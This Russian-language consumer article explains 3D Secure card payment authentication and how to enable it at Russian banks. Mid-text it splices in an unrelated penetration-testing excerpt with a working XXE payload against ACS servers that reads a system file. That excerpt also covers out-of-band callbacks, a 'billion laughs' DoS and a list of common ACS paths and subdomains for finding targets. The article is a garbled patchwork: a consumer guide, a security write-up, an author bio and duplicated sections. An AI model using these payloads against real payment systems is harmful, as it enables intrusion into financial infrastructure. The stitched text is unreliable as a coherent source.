Технология 3D Secure – это гарант безопасности ваших денежных средтв на счете карты. Подробнее о технологии и как она работает расскажем в статье.
Что такое 3D secure простыми словами
Для безопасности владельцев пластиковых карт были внедрены следующие степени защиты:
- CVV-код. Находится на оборотной стороне карты. Предназначается для подтверждения подлинности карт во время совершения покупки или снятия денег.
- Именные карты. Такая карта отличается от неименной тем, что имеет на лицевой стороне имя и фамилию владельца. По ней злоумышленнику сложнее будет оплатить товар в торговых точках, так как продавец может потребовать предъявить паспорт.
- Пин-коды. Такой код придумывает сам владелец во время первого использования карты. Защищает от снятия денег с карты злоумышленниками, например, если она была потеряна.
- 3D-Secure — технология, которая повышает безопасность проведения платежей при покупках через интернет.
3D Secure – это двухфакторная аутентификация для авторизации владельца карты во время совершения платежа. Если простыми словами, то 3D Secure – это код, который приходит владельцу карты на телефон при оплате товара. Этим паролем пользователь подтверждает, что именно он и никто другой совершает платеж.
Технология основана на протоколе расширяемого языка разметки. Применяется для защиты онлайн-платежей с дебетовых и кредитных карт.
Она не защищает денежные ресурсы, лежащие на карте, как пин-код, вводимый при снятии денег с банкомата. Также технологию не следует путать с CVV-кодом на обороте карты.
Почему именно 3D
3D-Secure не означает, что оплата проводится в каком-то трехмерном пространстве. Этот термин произошел от общего сокращенного названия трех систем или доменов (англ. «3 D» – Three Domains, что переводится как «Три домена»), которые участвуют в процедуре обмена деньгами и обеспечивают защиту их перевода от владельца к продавцу. Ими являются:
- Домен эквайера – система продавца или банка, куда поступают деньги;
- Домен эмитента – система, которая выдала карту пользователю, совершающего платеж;
- Система, через которую проходит оплата, или домен совместимости. Он предоставляется системами Mastercard или Visa, поддерживающими технологию 3D-Secure.
Если технология подключена к карте ее держателя, то без ведома последнего провести платеж невозможно.
Видео: 3D Secure: как это работает? (схема работы и комментарии специалиста)
Как работает протокол
Работа протокола 3D Secure заключается в перенаправлении пользователя на страницу банка-эмитента, то есть банка, выпустившего карту. На этой странице пользователь должен будет ввести одноразовый код в специальное поле. Одноразовый пароль приходит по смс на номер телефона, привязанного к карте владельца.
Протокол будет задействован только в том случае, если услуга активирована.
Версии протокола 3D Secure
v1.0 – 2001 г -…v2.0 – 2014 г – Устарелоv2.1 – 2017 гv2.2 – 2018 г
В настоящее время большинство платежных сервисов используют версию 1.0.2 при проведении онлайн CNP-платежей, запрашивающих OTP-код.
Версия 1.0.2 была создана в 2001 году и в ней есть некоторые проблемы.
На данный момент актуальной версией является v2.2, и EMV планирует, что к концу 2020-го года она будет использоваться везде.
Это основная схема, необходимая для понимания всего процесса платежа с использованием механизма 3DS.
На этом рисунке мы видим все три домена, используемые в протоколе, а также последовательность сообщений между всеми участниками платежной операции.
Как подключить 3D Secure
Функция является бесплатной. Если у пользователя данная услуга не подключена, то он ее может активировать одним из способов:
- в офисе банка;
- по телефону;
- через банкомат;
- через онлайн-банкинг.
Примеры банков, которые подключают карты к 3D Secure:
| Наименование банка | Подключение | Стоимость подключения | Ежемесячная комиссия |
| Сбербанк | Автоматическое, при получении карты | Бесплатно | Нет |
| Тинькофф | Автоматическое, при получении карты | Бесплатно | Нет |
| ВТБ 24 | По заявлению владельца, через онлайн-банкинг | Бесплатно | Нет, взимается единоразовая плата за входящее смс с баланса телефона |
Обратившись в офис местного филиала банка
Подключение этой услуги осуществляется бесплатно. Владельцу карты необходимо сделать следующее:
- Прийти в банк с паспортом и картой.
- Написать заявление о подключении. Форму для заполнения выдаст сотрудник.
- Активация произойдет после совершения первого платежа.
По телефону
Подключить услугу можно по телефону, не выходя из дома. Например, для Сбербанка:
- Отправить Слово «Полный» в смс на номер 900.
- Дождаться сообщения с динамичным кодом (одноразовым паролем) из четырех цифр.
- Ввести эти цифры в ответном сообщении и отправить снова на номер 900.
- Дождаться смс с подтверждением о подключении.
- Теперь можно безопасно оплачивать услуги и товары по интернету.
Через банкомат
Чтобы осуществить подключение через банкомат, пользователю необходимо будет позвонить в банк и узнать о том, есть ли функция 3D на у его карты. Если ответ положительный, то владелец может смело отправляться в ближайший банкомат и подключать услугу.
- Вставить карту в банкомат именно того финансового учреждения, которое выпустило ее.
- Кликнуть по пункту «Другие операции».
- Найти и выбрать «3D Secure».
- Ввести номер мобильного, привязанного к карте.
Теперь динамичные коды для оплаты посредством технологии 3D Secure будут приходить на телефон при проведении платежа.
Через онлайн-банкинг
Подключить услугу можно в личном кабинете Сбербанка или любого банка, поддерживающего технологию. Будет показано на примере Сбербанка:
1 Открыть главную страницу банка и войти в личный кабинет.
2 Нажать на вкладку «Карты».
3 В выпавшем меню выбрать «Подключение 3D Secure».
Как это работает?
Так как интернет-мошенничество в последние годы на пике формы, то дополнительная защита при платежах – еще одна гарантия сохранности средств как для клиента, так и для магазинов.
Начиная с 2016 года многие банки, начали массово предлагать установку бесплатной опции 3D-Secure на карточки, предназначенные для расчетов в интернете. В последнее время эта услуга уже объявляется как обязательная, поэтому подключается она в автоматическом режиме в большинстве банков.
Среди банков, уже внедривших эту опцию, такие:
- Сбербанк;
- ВТБ;
- Тинькофф;
- Почта-Банк;
- Альфа-банк;
- Промсвязьбанк;
- «Открытие» и другие.
Для банка внедрение этой технологии – гарантия, что платеж проводит непосредственно держатель карты, так как код подтверждения приходит на номер телефона, зарегистрированного во время открытия карточного счета.
Что же касается магазинов, то многие интернет-площадки еще не подключили к себе на страницу эту опцию, и в теории они могут стать заложниками неприятной ситуации, когда при оплате деньги переводятся без ведома клиента, а затем он требует их возместить в полном объеме. В таком случае банк может оставить виновным магазин, и потребовать возместить ущерб, так как на сайте продавца допускается оплата без аутентификации. А в случае потери карты любой злоумышленник может провести оплату за счет чужих денег.
Раскрутим XXE
Рассмотрим следующий пример:
<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM “file:///proc/sys/kernel/hostname”>]><ThreeDSecure><Message id=“123-123-123-123-123-123″><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>∾</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>
acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.
Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.
Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:
<ThreeDSecure><Message id=” 123-123-123-123-123-123 “><PARes id=” 123-123-123-123-123-123 “><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>ACS server name</merID></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>
Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку “billion laughs” (проверялось на тестовом сервере).
Причины ошибок авторизации.
Бывают такие ситуации, когда при проведении онлайн-платежа приходит смс: «Ошибка авторизации». Существует несколько причин для получения подобного сообщения:
- Неверный ввод пароля. Необходимо ввести повторно правильный пароль.
- Истек срок действия одноразового пароля. В этом случае нужно запросить пароль повторно, т.к. срок действия таких паролей ограничен.
Оплата пройдет сразу, после ввода правильного пароля и одобрения банком текущей транзакции.
Карточки с 3D-Secure
Список популярных банков, поддерживающих услугу 3D Secure:
- Сбербанк;
- Альфа-банк;
- ВТБ;
- Бинбанк;
- «Русский Стандарт»;
- «Почта-банк»;
- «Тинькофф»;
- «Связной банк» с 2012 г.;
- «Уралсиб» с 06.2013;
- «Промсвязьбанк»;
- «Абсолют Банк» с 10.2013;
- МДМ с 11.2013;
- Ренессанс-кредит с 11.2013.
ДЛЯ СПРАВКИ: Карты, выпущенные ранее 2012 года, не поддерживают 3D Secure.
Где это можно найти?
В ходе нашего исследования мы обнаружили несколько распространенных URL-адресов:
/acs/pareq/___uid___/acspage/cap?RID=14&VAA=B/way4acs/pa?id=____id____/PaReqVISA.jsp/PaReqMC.jsp/mdpayacs/pareq/acs/auth/start.do
И распространенные имена поддоменов:
acs3ds3dssecurecappaymentsecm3dsauthtestacscard
Впрочем, иногда вы можете найти и другие интересные пути.
Если вы хотите найти что-то новое, используйте proxy interceptor и записывайте процесс совершения платежей для интересующей вас платежной системы.
Артём Суровцев
@artyomsurovtsev
Люблю технологии и все, что с ними связано. Верю, что величайшие открытия человечества еще впереди!
Преимущества и недостатки системы
К преимуществам можно отнести:
- Получение нового кода в смс при каждой покупке или оплате. Не нужно держать пароли в голове и менять их раз в месяц.
- Простота процедуры.
- Безопасность. Доступ к телефону есть только у владельца карты. Если же он украден, то мошеннику потребуется еще и карта.
Недостатки:
- При плохой связи или при полном ее отсутствии смс-коды могут не прийти на телефон. О том, как решить проблему, если пользователь не дождался прихода динамичного пароля, будет рассказано в блоке «Ответы на вопросы».
- Возможность похищения кода с компьютера. Операционные системы, через которые проводится платеж, подвержены заражению вирусами. Последние умеют анализировать коды и отправлять их злоумышленникам.
Преимущества и недостатки
Наряду с преимуществами данной системы аутентификации у неё имеются и недостатки. К безусловным преимуществам относится достаточно высокий уровень безопасности при работе с данной технологией. Ведь любой платёж, проходящий эту систему проверки, контролируется одноразовыми паролями, приходящими на телефон клиента при каждой финансовой операции. При этом доступ к телефону есть лишь у собственника карты или людей из его близкого окружения. Конечно, мобильный телефон могут украсть, но в этом случае мошеннику понадобится также и платёжная карта клиента.
Ещё одно преимущество состоит в том, что владельцу карточки не нужно постоянно держать в памяти пароль — об этом позаботится сама система.
Данная система будет удобна для тех, кто раньше уже пользовался услугами интернет-магазинов и имеет представление о том, какие данные требуется вводить при покупке.
К сожалению, эта современная технология кроме плюсов имеет и минусы. Не секрет, что многие пользователи, недостаточно владея компьютерными навыками, не хотят связываться с сервисом онлайн-торговли. Несмотря на простоту этой процедуры, не каждый клиент хочет вникать во все нюансы и тратить дополнительное время, чтобы пройти процедуру аутентификации банковской карты. Сталкиваясь с первыми проблемами при вводе данных, многие отказываются от оформления покупки, и товар при этом так и остаётся в виртуальной корзине интернет-магазина.
Есть и ещё один минус. В настоящее время многие телефоны работают на системе Андроид, подверженной заражению разнообразными вирусами и шпионскими приложениями. Вирусы умеют анализировать поступившие данные и инициировать платёж с паролем. Чтобы избежать подобных проблем, пользователю следует установить популярную антивирусную программу, которая станет барьером на пути мошеннических операций с чужими карточками.
Читайте также: Как пользоваться Google Pay?
Лучшие кэшбэк-карты 2021
ВостОк
Восточный Банк
Дебетовая карта
- до 7% кэшбэка
- 5,5% на остаток
- 0₽ за обслуживание
Подробнее
Opencard
Открытие
Дебетовая карта
- до 11% кэшбэка
- 4% на остаток
- 0₽ за обслуживание
Подробнее
Польза
Хоум Кредит Банк
Дебетовая карта
- до 22% кэшбэка
- 5% на остаток
- 0₽ за обслуживание
Подробнее
Как избежать действий мошенников и обхода системы безопасности
Владелец карты может защитить себя от мошеннических действий следующими способами:
- регулярно обновлять антивирусную базу и пользоваться только лицензионным антивирусом на компьютере или смартфоне, с которых проводятся платежи;
- ничего не покупать на неизвестных или малознакомых сайтах;
- внимательно читать текст, который пришел в смс вместе с динамичным кодом;
- желательно установить дневной лимит на снятие денег с карты. Это обезопасит владельца от потери всей суммы в случае атаки злоумышленников;
- и самый редкий, но все же встречающийся ход от воров электронных денег – это перевыпуск сим-карты. Поэтому, если телефон владельца перестал ловить сеть даже в тех районах, где всегда хорошо ловил ее, держателю карты нужно будет как можно быстрее обратиться в банк для блокирования счета и к своему провайдеру – для замены номера.